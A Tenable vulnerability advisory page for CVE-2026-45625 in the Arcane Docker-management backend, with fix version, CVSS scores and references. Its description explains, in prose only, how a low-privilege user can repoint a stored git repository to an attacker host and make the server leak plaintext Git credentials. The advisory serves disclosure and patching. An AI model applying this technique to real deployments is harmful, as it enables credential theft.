SCA: security update for github.com/getarcaneapp/arcane/backend (GHSA-7h26-hg47-p9hx)

critical Tenable Cloud Security Plugin ID 442067

Description

There are packages installed that are affected by a vulnerability referenced in the following CVE:

- Arcane is an interface for managing Docker containers, images, networks, and volumes. Prior to 1.19.0,
Arcane's huma-based REST API exposes nine endpoints under /api/customize/git-repositories and /api/git-
repositories/sync for managing GitOps source repositories and their stored credentials. Eight of those
endpoints (list, create, get, update, delete, test, listBranches, browseFiles) never call the
checkAdmin(ctx) helper that every other admin-managed resource (container registries, environments, users,
API keys, swarm, settings, system, notifications, events) uses, and the huma authentication middleware
deliberately enforces only authentication, not the admin role. As a result, any logged-in user with the
default user role can list, create, modify, delete, and test git repository configurations. By repointing
an existing repository's URL to an attacker-controlled host while omitting the token/sshKey fields (which
UpdateRepository only rewrites when explicitly supplied), the attacker causes Arcane to decrypt the
legitimate PAT/SSH key on its next /test, /branches, or /files call and present it as HTTP Basic auth (or
SSH key auth) to the attacker's host — producing a one-step exfiltration of plaintext Git credentials.
This vulnerability is fixed in 1.19.0. (CVE-2026-45625)

Solution

Update the github.com/getarcaneapp/arcane/backend library and its related packages to version 1.19.0 or later.

See Also

https://github.com/advisories/GHSA-7h26-hg47-p9hx

Plugin Details

Severity: Critical

ID: 442067

Version: Revision 1.7

Type: Local

Family: SCA Checks

Published: 5/18/2026

Updated: 7/2/2026

Supported Sensors: Tenable Cloud Security, Tenable Self-Hosted Container Security

Risk Information

VPR

Risk Factor: Medium

Score: 5

Percentile: 94.4

Vendor

Vendor Severity: Critical

CVSS v2

Risk Factor: High

Base Score: 9

Temporal Score: 6.7

Vector: CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C

CVSS Score Source: CVE-2026-45625

CVSS v3

Risk Factor: Critical

Base Score: 9.9

Temporal Score: 8.6

Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Temporal Vector: CVSS:3.0/E:U/RL:O/RC:C

Vulnerability Information

Exploit Ease: No known exploits are available

Patch Publication Date: 5/18/2026

Vulnerability Publication Date: 5/18/2026

Reference Information

CVE: CVE-2026-45625

cwe: CWE-862